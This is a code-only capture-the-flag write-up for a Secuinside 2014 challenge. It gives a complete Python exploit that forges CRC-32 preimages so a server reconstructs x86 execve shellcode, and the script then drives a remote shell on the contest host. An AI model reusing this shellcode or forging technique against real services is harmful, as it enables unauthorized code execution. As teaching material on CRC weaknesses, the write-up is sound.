
Secuinside 2014 "This is not bad" write-up (code only)

진모씨 2014. 6. 15. 12:17

Description:

CRC32 preimage attack (with x86 execve shellcode!). The point the script demonstrates: CRC-32 is a linear checksum, not a MAC — once the salt is known, any 32-bit CRC value can be hit by choosing four input bytes, so a CRC over salt+data gives no integrity against whoever controls the data.


sc.tar


from binascii import crc32

from socket import *

from struct import *

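# Challenge endpoint as it was during Secuinside 2014 (almost certainly gone).
HOST = "54.178.232.195"
PORT = 5757

# Linux x86 execve("/bin//sh", ["/bin//sh"], envp=whatever edx holds),
# 23 bytes, plus one NOP so the length is a multiple of 4: each 4-byte chunk
# becomes one forced CRC value.
#   31 c0        xor eax, eax
#   50           push eax              ; NUL terminator
#   68 2f2f7368  push "//sh"
#   68 2f62696e  push "/bin"
#   89 e3        mov ebx, esp          ; path
#   50           push eax
#   53           push ebx
#   89 e1        mov ecx, esp          ; argv
#   b0 0b        mov al, 11            ; __NR_execve
#   cd 80        int 0x80
#   90           nop
shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
             b"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x90")


def build_top_byte_table():
    """Return a 256-entry list: index = top byte, value = the one-byte CRC
    update ``crc32(byte, 0) & 0xffffffff`` that has that top byte.

    A CRC-32 byte step is ``crc' = T[idx] ^ (crc >> 8)`` (``T`` being the
    standard table, effectively XOR-adjusted for the inversion binascii
    applies before and after), so the top byte of ``crc'`` comes from
    ``T[idx]`` alone.  The 256 values of ``T`` have 256 distinct top bytes,
    which is what lets crc32_preimage pick a table value by the top byte it
    needs.

    Raises:
        ValueError: if the top bytes are not a bijection (does not happen for
            CRC-32, but the attack is meaningless without it, so it is checked
            rather than assumed).
    """
    by_top = {}
    for i in range(256):
        entry = crc32(pack("B", i), 0) & 0xffffffff
        by_top[entry >> 24] = entry
    if len(by_top) != 256:
        raise ValueError("CRC-32 table top bytes are not all distinct")
    return [by_top[k] for k in range(256)]


def crc32_preimage(target, crc, table):
    """Return 4 bytes ``r`` with ``crc32(r, crc) & 0xffffffff == target``.

    Args:
        target: wanted 32-bit CRC value (0 <= target < 2**32).
        crc: running CRC, masked to 32 bits, of the data that precedes ``r``
            (``crc32(prefix) & 0xffffffff``).
        table: result of build_top_byte_table().

    Returns:
        A 4-byte string (``str`` on Python 2, ``bytes`` on Python 3).

    Raises:
        ValueError: if no byte produces a required table value, or the final
            self-check fails (neither happens with a correct table).

    Four byte steps expand to
    ``T4 ^ (T3 >> 8) ^ (T2 >> 16) ^ (T1 >> 24) ^ (crc >> 32)`` and the last
    term is zero, so the result depends only on the four table values.
    Pass 1 (most significant result byte first) picks each Ti by the top byte
    that cancels what the already-picked values contribute and leaves the
    wanted byte.  Pass 2 (first input byte first) brute-forces the byte that
    reaches each Ti; matching the top byte of a single step is exact because
    top bytes are unique in ``table``.
    """
    chosen = []  # table values for steps 4, 3, 2, 1 (last step first)
    for p in range(4):
        want = (target >> (8 * (3 - p))) & 0xff
        for q, prev in enumerate(chosen):
            # byte (3 - p + q) of the value picked for step 4 - q lands on
            # byte (3 - p) of the result once it has been shifted right 8 * q
            want ^= (prev >> (8 * (3 - p + q))) & 0xff
        chosen.append(table[want])

    start = crc
    out = bytearray()
    for needed in reversed(chosen):
        for b in range(256):
            step = crc32(pack("B", b), crc) & 0xffffffff
            if step >> 24 == needed >> 24:
                break
        else:
            raise ValueError("no input byte yields table value %#010x" % needed)
        out.append(b)
        crc = step
    result = bytes(out)
    # End-to-end check so a wrong table or derivation fails loudly instead of
    # sending a payload that silently does not match.
    if crc32(result, start) & 0xffffffff != target:
        raise ValueError("preimage self-check failed for %#010x" % target)
    return result


def forge_payload(data, crc, table):
    """Forge, for each 4-byte chunk of ``data``, a 4-byte string whose CRC-32
    (seeded with ``crc``) equals that chunk read as a little-endian uint32.

    Every chunk is an independent preimage against the same seed; the chunks
    are not chained.  Laying out the resulting CRC values as little-endian
    uint32s therefore reproduces ``data`` byte for byte.

    Raises:
        ValueError: if ``len(data)`` is not a multiple of 4.
    """
    if len(data) % 4:
        raise ValueError("data length must be a multiple of 4, got %d" % len(data))
    return [crc32_preimage(unpack("<I", data[off:off + 4])[0], crc, table)
            for off in range(0, len(data), 4)]


def main(host=HOST, port=PORT):
    """Connect, read the salt, send the forged strings, then relay a shell."""
    mysocket = socket(AF_INET, SOCK_STREAM)
    mysocket.connect((host, port))
    try:
        d = mysocket.recv(1024)
        if not d:
            raise RuntimeError("connection closed before the salt arrived")
        # Banner layout taken from the original exploit: 6-byte prefix, hex
        # salt, one trailing byte.  A short recv() would truncate the hex and
        # make decode() fail -- NOTE(review): read up to the trailer if the
        # banner can ever exceed one segment.
        salt = d[6:-1].decode('hex')
        org_crc = crc32(salt) & 0xffffffff
        payload = forge_payload(shellcode, org_crc, build_top_byte_table())
        # What goes on the wire (count, then each string), for the write-up.
        print(pack("<I", len(payload)).encode("hex")
              + ''.join(p.encode("hex") for p in payload))
        # Server-side CRCs; laid out as uint32s these are the shellcode bytes.
        print([hex(crc32(salt + p) & 0xffffffff) for p in payload])
        # "<I" is the explicit little-endian form of the native "I" the
        # original used; sendall() because send() may write only part of the
        # buffer on a TCP socket.
        mysocket.sendall(pack("<I", len(payload)))
        for s in payload:
            mysocket.sendall(pack("<I", len(s)) + s)
        while True:
            mysocket.sendall(raw_input("$ ") + "\n")
            reply = mysocket.recv(1024)
            if not reply:
                break  # remote side closed the shell
            print(reply)
    finally:
        mysocket.close()


if __name__ == "__main__":
    main()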